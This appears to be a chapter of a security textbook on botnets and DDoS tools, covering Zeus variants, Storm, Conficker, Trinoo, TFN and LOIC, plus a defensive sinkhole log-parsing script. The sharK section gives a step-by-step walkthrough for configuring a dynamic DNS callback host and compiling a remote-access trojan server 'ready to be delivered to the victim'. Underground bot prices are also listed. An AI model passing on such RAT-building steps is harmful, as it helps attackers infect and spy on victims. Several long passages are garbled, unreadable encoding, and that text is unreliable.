GameOver Zeus is a peer-to-peer "p2p botnet" built on the Zeus banking trojan, and since it appeared in 2011 it has been the most widespread of the Zeus variants. It is a product of the "underground economy" in which "do-it-yourself (DIY) botnet kits" are bought and sold. The first of these kits was the "Zeus botnet" itself, first seen in 2006; after the Zeus source code leaked in 2011, new kits such as ICE IX and Citadel were built on it. All of them steal banking credentials from the victim through the web injects described above, and the later builds add sandbox detection to hinder analysis. In 2010 the Zeus variant known as Murofet/Licat introduced a domain generation algorithm (DGA) for locating its C&C, and this line of development led to P2P Zeus, also called GameOver ZeuS. P2P Zeus differs from the earlier variants in that it has no fixed C&C servers that can be seized: the bots locate each other and relay commands, configuration and stolen data over a peer-to-peer network. That design was the answer to takedowns such as Microsoft's Operation b71 of March 2012, which disrupted Zeus, ICE IX and SpyEye botnets by seizing their C&C servers; P2P Zeus has no single point to seize.

In P2P Zeus every infected machine is a "peer". Each bot holds a list of other peers, and the P2P network carries the new configuration files, the binary updates and the stolen data, which is relayed to the operators through proxy bots. GOZ has also been used for "DDoS" attacks.

GOZ was distributed mainly through spam sent by the Cutwail botnet, one of the largest "spam botnets", whose messages carry attachments or links that lead to an exploit kit. The same campaigns delivered the Pony loader, a credential stealer sold with a PHP-based "builder" and control panel. Besides installing the P2P ZeuS malware, Pony steals the credentials stored on the infected machine by FTP/SFTP clients, browsers (HTTP/HTTPS) and e-mail clients, and sends them to the Pony C&C in an HTTP POST.



ZeuS v3 P2P Network (the diagram shows the steps an infected computer goes through, with the ZeuS botnet controller at the far end):

1.) The bot contacts a list of hard coded IPs from the binary using UDP on a high port (something like a P2P botnet).
2.) The bot(s) send back a list of IPs from other drones participating in the botnet (UDP on a high port).
3.) The bot registers itself at the ZeuS botnet controller by sending an HTTP POST to gameover2.php on the botnet C&C. This method is also used to send the stolen data to the C&C (HTTP POST /gameover2.php).
4.) The bot gets the config and binary update from the P2P network using TCP on a high port.



GOZ was also used to push the CryptoLocker ransomware onto infected machines. In 2014 the US Department of Justice announced Operation Tovar, an international action that disrupted the GameOver ZeuS network and indicted its alleged administrator.

(Source: Symantec)

Note: Dirt Jumper is a DDoS tool that has been distributed through the ZeuS botnet to launch DDoS attacks.



Botnet Trojan: sharK

sharK is a backdoor/remote administration trojan written in VB6. The client (the attacker's console) listens on a port and the server installed on the victim connects back to it, a "reverse connection" that gets through the victim's firewall ("firewall-bypassing"). Its features include:

- RC4 encryption of the traffic.
- zLib compression of transferred data.
- Screen and webcam capture (screen/cam capture).
- File manager and process manager on the victim.
- "registry editor", plus a keylogger that can log offline and upload later.
- Anti: Debugger, VmWare, Norman Sandbox, Sandboxie, VirtualPC, Symantec Sandbox, Virtual Box.
- The server connects back to the attacker through SIN hosts (a static IP address or a dynamic DNS name).
- Optional Fwb++ (Process Injection, API Unhook).
- Folder mirroring.

Since the attacker usually has no static IP address, a dynamic DNS name such as drmohammed.no-ip.org is registered and used as the SIN host:

[Screenshot: No-IP host configuration page (Dynamic Update Client): Hostname drmohammed, Host Type "DNS Host (A)" (other options: DNS Host (Round Robin), DNS Alias (CNAME), Port 80 Redirect, Web Redirect, AAAA (IPv6)), IP address 196.205.100.240, no group, "Enable Wildcard" greyed out as a Plus/Enhanced feature.]
[Screenshot: sharK 3.1 fwb++ client main window (tabs sharK, Desktop Preview, IRC-Chat, Website), an empty victim list with the columns Country, Username, PC Name, CPU, RAM, Idle, Version and Ping, and the log: "Initializing Client... Listening on Port: 60123 ... sharK 3.1 fwb++, Last Compiled: 30.03.2008 ... Updatecheck... Update-Check Failed!!!"; Copyright 2007-2008 (c) BoredCoders.]

After installing and running the sharK client, choose Create Server from the toolbar; the "New Server [sharK]" wizard appears, and its last page summarises the server that will be built:

[Screenshot: New Server wizard, Compile Summary: Servername Server1; Server EXE names YXj69vbo, rbrVF9LGj, KuvYSxoHR, FTLgGS6j, ICRe; Server file extensions .exe, .pif, .cmd, .bat, .com; Target directory: Application Data Directory; Server Type: Fullserver; Server mutex: sharKtiilY7EUfh; Connection interval: 4 seconds; HKLM Startup: Activated; HKCU Startup: Activated; SIN Hosts: 127.0.0.1:60123 (Not tested); Blacklist: No items. Created 8/31/2010; "Regards, sNiper109".]

Click New profile, then give the server a name and a password and set the connection interval on the Basic Settings page. The wizard's pages are Basic Settings, Server Installation, Start Up, Install Events, Bind Files, Blacklist, Anti Debugging, Stealth, Firewall Bypass, Liteserver, Advanced, Summary and Compile:

[Screenshot: Basic Settings page: Servername sharK, Server Password, Connection Interval, "Enable offline keylogger with maximum logsize of 1000 KByte (0 = Unlimited)", the SIN-Addresses list, and the buttons Save Current Profile and Test Hosts; "Regards, sNiper109 and rockZ", Copyright 2007-2008 (c) BoredCoders.com.]

Under SIN-Addresses click Add and enter the address (IP or dynamic DNS name) and port that the server should connect back to, then click Save Current Profile. Finally, go to the Compile page and click Compile; the server executable is written out, ready to be delivered to the victim.






Poison Ivy: Botnet Command Control Center

Poison Ivy is one of the best-known "remote administration tools" (RATs). Its client acts as the command and control center: the servers planted on the victims connect back to it, and the attacker manages them from the connection list.

[Screenshot: Poison Ivy client window with a connection from 127.0.0.1 in the list and the context menu of management functions.]

Botnet Trojan: PlugBot

Source: http://www.redteamsecure.com/labs/the plugbot/plugbot-penetration-test-tool

PlugBot is a hardware botnet project: a small plug computer that is planted inside the target's premises during a physical penetration test and then behaves like a bot controlled from outside. In the project's own words:

    PlugBot is a hardware botnet project.
    It is a covert penetration testing device (bot) designed for covert use during physical penetration tests.

[Screenshot: PlugBot web Dashboard.]

The device has a Gigabit Ethernet port, and its command dashboard is built with PHP and MySQL.



Botnet Trojans: Illusion Bot and NetBot Attacker

Illusion Bot

- Command and control (C&C) over IRC or HTTP.
- Built-in proxy servers (Socks4, Socks5).
- Built-in FTP server.
- MD5-hashed passwords.
- Rootkit component (installed as a kernel driver).
- "Code Injection" into other processes.
- Control over IRC, with automatic op for the admin on the channel.
- Bypasses the Windows XP SP2 firewall by adding itself to the trusted applications.
- DDoS attacks.

[Screenshot: Illusion Bot builder: IRC Administration (two hosts with port 6667 and channel), Default services (Socks4 port, Socks5 port, FTP port, IRC access), bot password with "MD5 Crypt", and the options "install kernel driver", "Auto OP admin on IRC channel", "IRC server need password" and "Add to trusted apps".]

NetBot Attacker

NetBot Attacker is a DDoS bot controller (of Chinese origin) whose console lists the online hosts and sends attack orders to them. The kit comes as a RAR archive containing the controller's INI configuration and its EXE; the generated bots report back to the controller's listening port.

[Screenshot: NetBot Attacker 1.4 English console: tabs "Online hosts", "Attack Area", "Collective order" and "Use help"; host table with the columns PC IP, Computer, Memory and Service edition, showing one Windows XP host (219.159.4.24) online; status bar "Monitor port 8080 ... Security warning team (www.hackeroo.com) ... Had 1 PC on-line".]

All of the tools above are built on the same basic idea: a toolkit that makes it easy to build the bot, spread it and control the infected machines, with the toolkit itself sold and resold. We now turn to how botnets are fought.

"Battlefronts against a botnet"

Fighting a botnet is not a one-to-one matter between a defender and an attacker: the botnet has several components (the bot on the infected host, the C&C infrastructure and the operators behind it), and each has to be attacked in its own way. The battle is fought on two fronts:

- "The technical front".
- "The legal front".


"The technical front" 

."Network" a^jJJIj "Host" t a^a^ll j^jj^ ^^hj^^ o±^\ ^^>*-^^ j^j^ ^jiill/^uili 4 ^ ±a II 

M Host Component' 1 uLJiaII ^ 

"Network Component ?f ^ 
^Drop Zone ^ uj^^ ^W-^j^^ ^C&C y^^- J^A^j .^j/MI j>^>V' x^ J^lxlll tj^j cil3^3 jjjjl l 
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^^Ic ^LuixJl lafll L_fl jjoj l—Ua . ^Lu^o .Ua ^aL-£a^)ll <jxi <^lj ^ J^-J ^1 .4_l£juixJl 4_Jj^aJ! L-jUj^VI ^ ^ a Ajuj^U .jL-ajVI 

(jl t . AliikJl CjLi^xijJl L£*^ <£fuJI (jl£ tAKjuLall ^j«iaJl t . UjuJj J jj^a jlJ <jc I^isu AjfLliJl iaj ^aJJ ^1 La jUll (_$!>Ual 

/a^Ull <-dJ^C dltj jJj^)Jl ^usyft iC-ul A^Jjui (jj^-a 4£jjuJl (jjJ (jxi <j| L— Ll^ _4 LHjuJ ^aJJ 

D^A ialLajV CjU» jlstxJl ~\ I^JLujI ^aJJ (illi «^*JJ ^ Cf-^* ^^-^J f^"^^ J^ L - L ^ A^Jjui CjL j^xj £xi (JxAjtjll ^jVI 0 J^*^ 

Sinkhole 
Takedown 

J^lL li& ^ji^jjj .a£jJo3I til jLoj j CjIj jjjjII JL^ajl ja^i ^1 (jii^LlI j jlJ cjIj jjjjII ^jl ^ ^^ic ojinju^l ikl Sinkhole 

.sinkholing 

o^j^ll "hijacking" ^Ualkl <C&C <cjIjjjjj1I a£i£ ± a_£L C5 ]c Jj^*JI 4_iLc :Sinkholing 

CjIj jJj^)JI (jL^ajl (^^ic (J jj^a^Jl (jxa (jjl^.ljll ^jS^ftJJ ^1^. Lfrll^j ^ ^aJJ (jjlxaj.^11 „ C&C^ (J 1 "**^ 1 ^— l^J jJj^)ll (Jj3 (j-a 4_xil,laJLuil ^aJJ 

:gr L La ^ u^y^ t j ' ^j sinkholing c> 

"Location of compromised systems" aSjI^JI l^Vl 
." W/ia^ information is being sent by the bots" ^tSjJI ^> l^IUjI ^ ^1 c^UjkJI U 

jj^aixJI lS^^ 4-^^ '^^^ La£ .dilj jjjjll ciiVL^ajl j ^ CjI^cLoixJI ^a^lj Sinkholing I Takedown 

aSliA ^jl ^ j^jxj jl ^cSl ^^jI! 4_iL^j]| j! <£jjaJ! 4^^. l-jL jl CjIj jjj^)3I ^l^jl ^1 j^jj Botnet takedown 

_<Jc. j& c ^j3I ^ jj ^^Jc ^Sjii I^a j tl^. L-ixj^a jl 1^. ^j/Ml ^jl ^ "tacking down" -l^LLu^} _ja ji* j^t. £±& jA\ 

AilLkxJl ^jc ^!>LV1 (j-a ia^a j^judj l^JalL nl (j^J ^ jAslSI dj^iU£ til jJjaLiill L_jLai^. ^a^kjjaaJ c _^j3I CjIj jJjjll 6 Jll<Jl J^f^ 

CjI^JjoJI ^jl ^3 / Ll a. .il j^. (J^juJI ^jxi Ljajl djlj jJj^)1I ^^Ic O^LaJjalll ^ iklLuji ^aJJ (J?'^ < jL ^ j;'"J Q ^ L_jLud^J 

L-Ixj gall blllletprOOf AiLjalaiVl <^^^" l^iaLjalajl ^aJJ c _^jll A^jJoll Jjt a iklujj c _^j3l CjIj jill tilU^i tl^ LUjujI l^a. J^juJ\ 

t^jjiLdj^l^Vl ^l^>fkJI j <cl u ^ill j a£jjoJI CjLd^k ^^xi^Ld j t^jjjlflll ilijj CjUaLai ^ ^jjlxiill J^Lk cJ^^ ^ L^ Lllc. 

a^jII ^jI j^JI j Jja ^ Rustock botnet ^L^J) jIS ^ tJUJI .^ILJI ^LaJ) ^ ^ j^^^ ^U^^ j 
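As an added illustration of what a sinkhole yields (example code written for this page, not a tool from any of the operations described), the script below parses constructed access-log lines from a sinkhole web server that has been given the C&C hostnames of two families, keeps only the requests that look like bot check-ins, and reports the number of victims per family, per /24 network (a coarse stand-in for the "location of compromised systems") and how long each victim kept checking in. The log lines use documentation address ranges; /gameover2.php is the path from the diagram above, while /gate.php and the family labels are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: combined-format access log of a sinkhole web server that
# now answers for the C&C hostnames of two families. Addresses are documentation
# ranges, not real victims.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2014:10:01:02 +0000] "POST /gameover2.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Mar/2014:10:31:07 +0000] "POST /gameover2.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
203.0.113.77 - - [12/Mar/2014:10:02:15 +0000] "POST /gameover2.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Mar/2014:10:03:44 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
198.51.100.23 - - [12/Mar/2014:10:03:45 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.9 - - [12/Mar/2014:10:05:00 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.0.2.9 - - [12/Mar/2014:11:05:00 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
"""

# Assumed mapping from the check-in URI each family uses to a label for the report.
# gameover2.php is the path named in the diagram above; gate.php is assumed for Pony.
FAMILY_BY_PATH = {"/gameover2.php": "GameOver Zeus", "/gate.php": "Pony loader"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')


def parse_log(text):
    """Turn access-log lines into dicts; lines that do not parse are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            records.append(rec)
    return records


def checkins(records):
    """Keep only bot check-ins: a POST to a known C&C path. Browsers that
    stumble on the sinkhole (favicon, GET /) are dropped here."""
    hits = []
    for r in records:
        family = FAMILY_BY_PATH.get(r["path"])
        if family and r["method"] == "POST":
            hits.append(dict(r, family=family))
    return hits


def network24(ip):
    return ".".join(ip.split(".")[:3]) + ".0/24"


def summarize(hits):
    """Victims per family, per /24 (a coarse 'where are they'), and how long
    each victim kept checking in (first to last POST, in seconds)."""
    per_family = defaultdict(set)
    per_network = defaultdict(set)
    first, last = {}, {}
    for h in hits:
        ip = h["ip"]
        per_family[h["family"]].add(ip)
        per_network[network24(ip)].add(ip)
        first[ip] = min(first.get(ip, h["ts"]), h["ts"])
        last[ip] = max(last.get(ip, h["ts"]), h["ts"])
    return {
        "victims_per_family": {f: len(s) for f, s in per_family.items()},
        "victims_per_network": {n: len(s) for n, s in per_network.items()},
        "checkin_span_seconds": {ip: int((last[ip] - first[ip]).total_seconds())
                                 for ip in first},
    }


def sinkhole_report(text=SAMPLE_LOG):
    return summarize(checkins(parse_log(text)))


if __name__ == "__main__":
    for key, value in sinkhole_report().items():
        print(key, value)
```

On real sinkhole logs the same report is what gets handed to the ISPs and CERTs responsible for the source networks, which is the "assist law enforcement" side of the legal front below; the per-victim time span also shows which machines keep checking in after a cleanup campaign.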

."The legal front" ^) 

"Legal Remedies" <H^t 4- 

l^JLtil 
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"Assist Law Enforcement Officers" Cjj^\ SjpL^a ^ 

M Anti-Cybercrime Legislation" ^jj^V* Hb*^ ^aiti*! cjUjj^j ^ 

^JjjaU <Jl^l ( : ^> J Al^\ j-G ( ♦ 1 J I>1 ^ ^ ,l5*^W lA^J^J ^aJ ^^jll j dljjljVl ^ajsu* A j 6<JlijC.| t^jjq^lN (jjjLall ilijj lajl > >i 

Most Common Botnets

Zeus Botnet

Zeus, also written ZeuS, is a "crimeware botnet" that steals banking credentials and other data from the infected machine. The most widespread variants are Citadel and IceIX, and the most recent and largest is Gameover Zeus.

[Figure 1: Percentage of banking malware by botnet in 2013 (Source: Dell SecureWorks). The smaller shares visible in the chart are Gozi, Bugat, Torpig 2%, Shylock 3% and IceIX 2%.]

The SpyEye botnet, which was used for the same kind of banking fraud, should not be forgotten either.

Storm Botnet

The Storm botnet is made up of machines infected by the "Storm worm", a trojan horse spread by e-mail. The malware opens a backdoor on the infected machine, which the operators then use as a "spam relay", and the bots talk to each other over a "peer networking" protocol rather than to a central server; a rootkit hides the infection from the user and from antivirus. Storm was one of the first large botnets to rely on P2P, which is why it is counted as a new generation of botnet.

In 2007 the botnet was estimated at millions of machines; by 2008 it had shrunk to about 85,000. The author and operators of the botnet were never identified. Storm also defended itself: hosts that probed it were hit with DDoS attacks from the bots. It was used mainly for spam, including stock-fraud campaigns, and the scale of the botnet made it a concern for the security industry.

The "Storm worm" is detected under different names by the antivirus vendors:

Trojan-Downloader.Win32.Small.dam, Trojan.Downloader-647, Trojan.DL.Tibs.Gen!Pac13, Email-Worm.Win32.Zhelatin.a (Kaspersky), Downloader-BAI (McAfee), Troj/Dorf-Fam (Sophos), Trojan.Peacomm (Symantec), TROJ_SMALL.EDW (Trend Micro), Win32/Nuwar.N@MM (Microsoft).

So the same malware is known as Storm, Zhelatin, Nuwar and Peacomm. After Storm declined in 2008, the botnet that appeared in its place, and is believed to be its successor, was the Waledec botnet.



Waledec Botnet

Waledec, also written Waledac, is one of the botnets most used for sending spam. Its spam campaigns typically carried links tied to holidays, news events and greeting cards; the links led to pages hosting exploit code that targeted Adobe Reader, Adobe Flash and the Office Web Components (OWC10), and to fake downloads that were in fact the bot itself. Waledec also pushed "scareware" (fake antivirus) onto infected machines, which were then used to spread the same campaigns further. Its bots are "backdoor bots" that give the operators access to the infected host.

Besides sending spam, Waledec harvests e-mail addresses from the infected hosts and sends mail through them, and the botnet is organised as a layered P2P Botnet in which the bots hide the command servers behind themselves.

Asprox Botnet

Asprox was first identified in 2008 as a "phishing scams" botnet. It was then turned against websites: the bots search for vulnerable (ASP) web applications and use SQL injection to insert hidden iframes into their pages, so that visitors are redirected to sites hosting exploit code that installs the Asprox bot on them. Each newly infected machine joins the botnet and continues the search for vulnerable sites, so the infection spreads through SQL injection from one compromised site to the next, and the botnet grows without the operators having to send anything themselves. Asprox later ran spam campaigns that came in waves, going quiet for long stretches between them to avoid attention, and used the infected hosts to hide the sites behind those campaigns.

Gumblar Botnet

Gumblar, also known as Geno, takes a different route from the other botnets: it breaks into websites rather than attacking users directly, plants backdoors on the compromised sites for continued access, and uses stolen credentials to compromise more of them. Gumblar was discovered by ScanSafe in 2009. It injects hidden iframes into the pages of the compromised sites; the iframes load exploit code that infects visitors, whose machines are then used to harvest FTP credentials and other data and send them to the operators. With the stolen FTP credentials the attackers compromise more sites, the injected iframes spread the infection further, and the cycle repeats. By the end of 2009 Gumblar was among the most widespread web-based threats, and the backdoors it left on compromised sites kept it going.

Koobface Botnet

Koobface targets the social networks: Facebook, MySpace, Twitter and others. The contacts of an infected user receive a "Koobface message" with a link to a video; the page claims that a codec or player update must be installed to watch it, and the "update" is the Koobface bot. Once installed, the bot uses the victim's own social-network accounts to send the same message to more contacts, which is how it spreads.

The Koobface botnet consists of the infected machines and of a layer of proxies between them and the command servers: infected hosts forward traffic between the bots and the real C&C, so the addresses of the command servers stay hidden from researchers, and the bots only ever talk to that proxy layer.

Mariposa Botnet

Mariposa (Spanish for butterfly) is the botnet built with the Butterfly bot kit. It spread through MSN/Live Messenger messages, through peer-to-peer file sharing and as an autorun worm on USB drives. Mariposa steals usernames, passwords and credit-card details from the infected machines, and its bots can also be directed to launch distributed denial-of-service (DDoS) attacks.

Conficker

Conficker is a worm that remains one of the hardest infections to eradicate. Its author is unknown, and the number of machines it infected is estimated at up to 15 million. What is remarkable is that it never did much with that capacity: no large campaign was ever attributed to it, and the purpose of its author is still unclear. Microsoft offered a reward for information leading to the author, but despite all the attention the worm attracted, millions of machines were still infected years after its first variant appeared.

Common P2P Botnets

P2P botnets have become the norm for the large crimeware operations. The best known are ZeroAccess, TDL4/TDSS and Zeus V3, the last being the GameOver Zeus botnet.

ZeroAccess and TDL4/TDSS are rootkits that hide deep in the system and are hard to detect and remove. Every infected machine in these botnets is a peer that relays commands and updates to the others. ZeroAccess is used mainly to make money through "click-fraud schemes" and through bitcoin mining on the victims' machines.

[Figure: bot-herder (owner and operator) controlling the peer network.]

TDL is the rootkit family also known as TDSS. TDSS hides its files and network traffic and disables security software, and its later versions are bootkits: the latest version, TDL-4, infects the Master Boot Record (MBR) and therefore loads before Windows and before any antivirus, which is what makes it so resilient. Infection counts for the TDSS/TDL variants have ranged from tens of thous ands of machines to far more.

Some bots sold in underground forums, with their prices:

Aryan Bot (old version free, updated version for 50$)
Chronic Bot (400$)
Celsius Bot (500$)

The best-known HTTP bots used for DDoS attacks:

M BOT (60$)
AnonHTTP (50$)
Andromeda v2 (750$ with Ring3 rootkit support)

The best-known P2P bot used for DDoS attacks:

THOR, sold at a price of $8,000



https://www.facebook.com/tibea2004

10.6 DoS Tools (DOS TOOLS)

Many tools exist for launching denial-of-service attacks. Some were written for that single purpose, others are part of a larger attack toolkit, and most are used by people who do not understand how they work. When such a tool is combined with a worm or a trojan that spreads it, the result is a "blended threat", as we will see below.

"Some Popular DDoS Programs"

There are several well-known DDoS tools; the classic ones were written for Unix and Linux, and many of the newer ones for Windows. Most of them use the handler/agent model: the attacker controls one or more "handlers", and each handler controls many "agents", the compromised machines that actually send the flood.

Trinoo

Trinoo (also written trin00) is one of the first DDoS tools, first seen in the attacks of August 1999. It floods the target with UDP packets sent to random ports. Trinoo does not spoof the source addresses of the flood packets, so the agents can be identified from the traffic, and it has no other attack types. The agents run as a compiled binary daemon on Solaris 2.x systems. The handlers and agents were installed on machines compromised through buffer over-run bugs in RPC ("remote procedure call") services such as ttdbserverd, cmsd and statd (see CERT IN-99-04).

Trinoo was the first of the handler/agent DDoS tools to be analysed in detail. The attacker connects to the "handler" over TCP; the "handler" sends its commands to the "agent" over UDP, and the agents answer the handler over UDP. Both the handler and the agents are protected by passwords, so that a rival attacker who finds them cannot simply take them over. Trinoo was described in CERT Incident Note 99-04, and it was one of the tools behind the attacks of February 2000.

Trinoo was also ported to Windows as wintrinoo, distributed as a trojan that installs itself on the victim and waits for commands.

Further reading:
http://www.sans.org/security-resources/idfaq/trinoo.php
http://staff.washington.edu/dittrich/misc/trinoo.analysis

Tribe Flood Network (TFN)

TFN also uses the handler/agent model, but the commands from the "handler" to the "agent" travel in ICMP Echo Reply packets, which pass through many filters that block other traffic. Unlike trinoo and Stacheldraht, the "handler" has no interactive interface: the attacker runs the handler program from the command line on the handler host, so the attacker must already have access to that host by some other means. The agents support four attack types: UDP Flood, TCP SYN Flood, ICMP Echo flood and Smurf. The attacker can reach the "handler" through any means of remote access, for example a remote shell bound to a TCP port, UDP-based client/server remote shells, ICMP-based client/server shells such as LOKI, SSH terminal sessions, or normal telnet TCP terminal sessions. The control traffic from "handler" to "agent" is ICMP Echo Reply packets carrying a 16-bit command identifier, and since the commands are sent in the clear they can be read from captured traffic. For the full analysis, see:

http://staff.washington.edu/dittrich/misc/tfn.analysis

Stacheldraht

Stacheldraht (German for "barbed wire") combines features of the trinoo and TFN tools and adds encrypted communication between the attacker and the "handler", carried over TCP; the "handler" talks to the "agent" over TCP or ICMP. It also adds an automatic update of the agents. The attacks are the same as TFN's: UDP flood, TCP SYN flood, ICMP Echo flood and Smurf.

Shaft

Shaft is built on the same handler/agent model as trinoo, TFN and Stacheldraht, with some additions: the handler can switch its ports and servers on the fly (which makes it harder for port-based intrusion detection to follow), and a "ticket" mechanism pairs commands with agents. The attacker reaches the handler over telnet and authenticates with a password. A feature specific to Shaft is that it gathers statistics about the flood from the agents, which tells the attacker how effective the attack is against the target. The password and the ticket are obfuscated only by simple letter shifting (a Caesar cipher), so they are easy to recover from captured traffic. The attacks are UDP flood, TCP SYN flood and ICMP flood, and all three can be run together; the size of the flood packets and the duration of the attack are set in the command, and each agent reports the number of packets it sent.

Tribe Flood Network 2000 (TFN2K)

TFN2K is the successor to TFN. The commands from the attacker to the agents are sent over several transports (UDP, TCP and ICMP), chosen at random, and mixed with "decoy" packets to make the real commands harder to spot; the commands themselves are encrypted. The source addresses of the control packets are spoofed, and the attack traffic can be sent from spoofed addresses as well. In addition to flooding, TFN2K can attack a target with malformed packets that crash vulnerable systems.

Mstream

Mstream is a simpler tool whose agents flood the target with TCP ACK packets carrying spoofed source addresses. Its handler/agent commands are protected by passwords fixed at "compile time". The TCP ACK flood forces the target to answer every packet with a TCP RST, so the attack consumes the target's bandwidth in both directions.

Trinity

Trinity was one of the first DDoS tools controlled over IRC. Once installed on a compromised Linux machine, each Trinity agent joins an IRC channel and waits there for commands, so the attacker needs neither a list of agents nor separate handlers: IRC makes managing a large number of agents easy and hides the attacker behind the IRC network. The agents can launch several kinds of floods: UDP, IP fragment, TCP SYN, TCP RST, TCP ACK and others.

Between 1999 and 2001 Stacheldraht and TFN2K were the most widely used tools. Stacheldraht was found bundled with rootkits such as t0rnkit and with a variant of the 2001 Ramen worm, and TFN2K was ported to Windows NT. After them, IRC-controlled bots such as knight and kaiten.c ("IRC bot") took over; knight was seen inside rootkit bundles and was built for Windows with the Cygwin development libraries. These tools were usually distributed as unix tar-formatted archives, and the Windows builds shipped with a Cygwin-compiled version of GNU tar to unpack them.


Agobot (Phatbot)

Agobot, later developed into Phatbot, appeared in 2003 and 2004 and has such a large feature set that it is called the "Swiss army knife" of DDoS. Phatbot supports SYN floods, UDP floods, ICMP floods, Targa floods (malformed IP packets with invalid fragmentation and fragment offset values), wonk flood (a SYN followed by 1023 ACK packets), recursive HTTP GET flood and HTTP GET flood with random URLs. When the botnet is made up of hundreds or thousands of bots, the sum of these floods, in particular the HTTP requests that look like normal browsing, is enough to bring down large web servers.

Ping of death: an attack in which the attacker sends an ICMP echo request in an IP packet larger than the maximum size (65536 bytes) allowed by IP. The packet is sent in fragments, and when the receiving system reassembles them it can crash or stop responding, because older systems did not check the size on reassembly. Modern systems are patched against it.

LAND (Local Area Network Denial): a spoofed TCP SYN packet whose source address and port are the same as the destination address and port, so that the target keeps replying to itself until it locks up. It was discovered in 1997, and the vulnerability resurfaced in Windows Server 2003 and Windows XP SP2.

CPU Hog: a program that hogs the processor: it raises its own priority and consumes all the CPU time on the machine, so that nothing else, not even the user's input, gets to run.

Jolt2: the jolt2 program sends a stream of IP fragments that never complete a datagram, so the target's CPU is driven to 100% reassembling them; it works even against a target with more bandwidth than the attacker, and the effect lasts as long as the stream continues. Newer systems are patched against it.






Popular DDoS Programs" j^V) o-j^ ^-aIjj 



«0j51I ^lka ^ *UiVl 5^ t^'j ^^kl^ l- Stacheldrahtj Trinoo c> JjVl l>-j^ ^'j^ 

(j>i L^j j^^j cJ^-^l DDoS (J*^j Uui jjcj laJLujVI jj^aj j5^l c-Hj^ t ~- 1 ^J^' '" K ,' t L - J ^ jluJI 

'Low Orbit Ion Cannon (LOIC) ^jIj^I tij^l c> riT > ^j .^l^^U s jjla^ Ji^lj j^l^xl! 

(jj^kl ^jJa j 4<lnaJl (jial JC-VI ^LqI>1^Luj1 j ^ijAxJ ^aJ (illi AsU ^aJ j A^JjaJl ^1^.1 jUll^V dj) J^l^ <Jj^V1 ^ OjJ^laJ ^aJ L— Ll^ 

(jC 4 m ^ ^IjJ t A* > ^> Jj^-A^J! ollljl dlill c flA^J Ls ^\- "^J^Uijll AjusII" <jj^alj3 Jj3 ^ ojJjiaJ ^aJ ^ill SlOWlorfS ^1 J^' 

,(jUaj3l AjljujIj I— lLaaA 1 ■ llaJ (j-a "patched" 1 gajl] <jJajC CliLl^ ^j;^ ^lix^ J la - ^> J i o tdlij Ulc CjIj^VI (jC> ^Ij^VI (J^^ 3 

Low Orbit Ion Cannon (LOIC) i- 

http://sourceforge.net/projects/loic 
f±Ll\ J^i c> HTTP jl <UDP 'TCP jjj* ^ c> <^ t4 Vijnii CjUI > ^ sbl LOIC 

Clal Aialdl] 4juU3I ^al Jc ^a j^ilj A jLlLaa-G ^ ^ LdJ&! (Jjj-^ J^VI (J^J^ l^LixJjajl obi ,4£jjaJl Jc (J^ill (Jaa^jI] 

lAjJjIaJj Jj^VU ftbVI ~J a - ^aJ .dljjliVl ^^>^- L " ^ AjuUII ^1 ^ , ^ a J (J '^A^J ^-^J^-^l 

jiii-d A ^Vi'lVI CjL^alo jxi Jc l^jliLjaJjojl jVI ^aljj <>ilxJl 4j£L<J1 lA jIAj^I ^aJ C^ ^J^* J" U^J^^ - 

u^j 'Low Orbit Web Cannon cs^j JS LOIC ^j^-^W^^ <^aU. <^uj sbbUj < ja^JI 

^nJaj ( flj t gajj t oj< IjJJ (jl (j-a (jJj^laxJl (j^J ^— ^ J 4L_lJj3l CjlflJiiaJ Jc iaijJaJl CjljUlkl ^l^)^.] obVI oAA (j-d ^jujIjujVI (jia^iJl 
^a a iklLujJ (jl Uiajl (j£-dJj ;<Cjjjab<i fib) lA jUjcU l^liL gaJ (j^J ^ill 6^l^.VI (j^flaJ ;<JL^JI 4 atJiiaJj .Jfljl (Jaa^J C±^j L_JJj 
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l_jjj3! j^i l^-i^ jjj t^Lftill fit ^Ul " Yirehoiise" elila) l " d * Jl jj j."^^ a< <JL^j*l <Jjj^jj ^j£j L>.»L>.»I LOIC ,o* 
aIiA Jc C5 JtLJ uaj^ HTTP ji 'UDP 'TCP i> J^ U J jj U Ijii ^1 j jj jt^ jl di^ .cJ^JI 

jjyi,JjkjjuixJl L_flWl (Jj£j UiAic. j£l j .L-JJjll daL^jj^a] <JC JjuJI diUllall Jc ,JjJ 1 a 1 Jl 4_xiLa£3l Cjl Ala JaIj^J J^-JudJ j£-aJj ClljjjjVI 
JIa <L galAI S j£j*.VI ^1 jl) 4-^jU ^La* Jplc.L ^ jSl! Lllc. j 6<a^Lai ^Jj aJ CjUHall j>» ib^\j 4j&^ LOIC (J^*-^ UJ^J^ 

,Jjll ^aJJ jl j^i 4X. jJjuuJI ClA AlaH £J-G jl t^djUUAl ft^C-lS ^.jljk 

l& j 'IRC J LOIC c> Jl j^Aj u' LOIC ^^i^ c/V ^il '"Hivemind" * j±* ^ J*^ j LOIC Jja*j ^ 
c_i£j J J^i* LOIC IRC j' jj ^ ^ cs^' "master user" ^ v^ . n* t$Ac s jlajjuJI 

<J3I LOIC ^ j-a <c j>^<J CjIa^JI tills jjj^j AJlxi ji&l (Jjjj^ ciiLaaJh (j^-lal ^Ld^jjabAl j£-*j t(jjj£A! liA J .•J-aJj 

